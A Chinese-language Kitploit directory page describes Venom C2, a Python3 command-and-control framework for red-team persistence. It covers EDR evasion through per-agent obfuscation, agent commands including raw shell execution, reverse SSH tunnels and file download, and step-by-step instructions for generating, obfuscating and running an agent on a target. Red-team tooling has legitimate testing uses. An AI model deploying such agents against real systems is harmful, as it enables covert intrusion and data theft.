Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
venom — Venom C2 是一个无依赖的 Python3 命令与控制框架,用于红队持久化。 | Kitploit
工具/GitHubGitHub/boku7/venom
加密/解密工具Payload生成持久化机制横向移动Shellcode后渗透利用命令与控制红队远程访问工具
GitHubboku7/venom

venom

Venom C2 是一个无依赖的 Python3 命令与控制框架,用于红队持久化。

查看仓库
436759个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Venom C2

Venom C2 是一个无依赖的 Python3 命令与控制框架,专为红队持久化设计,无需安装额外包即可在系统上运行。它包含一个 Flask 团队服务器、一个 Electron 操作员图形界面,以及一个通过可配置 AES 加密 JSON 消息在 HTTP/HTTPS 上进行通信的单文件 Python 代理。你可以用它执行命令、管理文件、维持访问权限,以及从受控系统创建 SSH 反向隧道。

背景

在网络权限提升过程中,我们接触了许多运行着奇异发行版和架构的生产系统。我们试图建立持久化控制,但手头的工具和技术都不奏效。此外,部分目标系统运行着 EDR。

这些都是生产环境,因此我们不想安装任何包。我们需要一个无需依赖即可运行的 C2 代理。这些系统上安装了 Python3,于是我就在渗透过程中创建了 Venom C2——一个无依赖、即插即用的 Python3 C2 代理。

我们不愿使用现成的 C2 代理,因为担心它们可能被蓝队检测到。 独特的代码是绕过现代 EDR 的关键

由于系统数量众多,我们为每个代理自动生成了独特的混淆、命名、文件系统路径、不同的网络回调域名以及独特的网络路径请求。

我把它命名为 Venom,因为我儿子喜欢蜘蛛侠中的毒液反派。另外,Python 是一种蛇,而酷蛇都有毒液,所以感觉这个名字很合适。

Venom C2 的未来

没有未来。

这只是一个我在渗透过程中临时开发的 C2 项目。我花了大约两天时间让它变得稳定可靠,能够在目标环境中工作。它完成了任务,在剩下的六周渗透中为我们提供了网络持久化。我不打算继续开发或使用这个项目,所以我认为它适合公开发布。

否则它将只能消失在 devNULL...

devnull

Venom C2 组件与特性

服务器

  • Python3 Flask
  • 支持多个操作员的团队服务器
  • 保存命令历史
  • 配置代理的脚本
  • 混淆代理的脚本
  • 管理代理连接
  • 与 GUI 客户端通信的 API
  • 自定义配置文件,从以下大型数组中随机选择:
    • C2 消息参数名称
    • 随机头部
    • 具有可扩展值类型的随机 JSON 属性

客户端 GUI

  • Electron
  • 适用于 Linux、macOS、Windows
  • GUI 是 Loki GUI 的精简版本

代理

  • Python3 无依赖
  • 消息使用可配置的 AES 密钥加密
  • 所有消息均以 JSON POST 请求发送
  • 自定义配置文件,从以下大型数组中随机选择:
    • URI 基础路径(对设置反向代理路由很有用)
    • 每个代理功能对应的多个 URI 路径
    • C2 消息参数名称
    • User-Agent
    • 随机头部
    • 具有可扩展值类型的随机 JSON 属性

代理命令

[11-04-2025 11:31 AM MST] admin help

root@kitploit:~
help     : Display this help menu
ls       : List directory contents
pwd      : Show current working directory
cd       : Change directory
cat      : Display file contents
mv       : Move/rename files or directories
cp       : Copy files or directories
mkdir    : Create directory
rmdir    : Remove empty directory
write    : Write content to file
chmod    : Change file permissions
rm       : Remove (delete) files
shell    : Execute raw shell command
sleep    : Make agent sleep with optional jitter
sshrev   : Create reverse SSH tunnel
kill     : Terminate agent process
upload   : Upload a file from your local operator box to the remote agent box
download : Download a file from remote agent box to local operator box

快速开始

1. 在服务器上获取代码

root@kitploit:~
git clone https://github.com/boku7/venom 
cd venom

2. 安装服务器依赖 (Python 3)

root@kitploit:~
pip3 install -r server/requirements.txt

3. 运行服务器

root@kitploit:~
cd server
python3 server.py --help
python3 server.py
  • 首次运行会生成管理员用户名和密码并打印到控制台。请复制并保存,以便客户端向服务器进行身份验证。
  • 或者自行设置:python3 server.py --adduser <USERNAME> <PASSWORD>

4. 在工作站上运行客户端

在工作站(而非服务器)上运行客户端 UI。它必须能够连接到服务器。

root@kitploit:~
cd ../client
npm install
npm run start

打开客户端,进入 Config 并输入服务器凭据。

安全

服务器的客户端 API 基础路径为 /api/。请勿将 /api/ 暴露到公共互联网。应使用 VPN 或严格的防火墙/反向代理规则,确保只有受信任的客户端可以访问。

5. 创建代理

在 server 目录下执行:

root@kitploit:~
python3 agent_create.py -H <server_host> -P <server_port> [-http]

6. 混淆代理

在 server 目录下执行:

root@kitploit:~
python3 agent_obfuscate.py agents/<generated_agent_file>.py

7. 运行代理

在目标计算机上运行,以执行控制。

root@kitploit:~
python3 /Users/bobby/venom/server/obfuscate/output/obfuscated_agent_20251104_110902.py
下载工具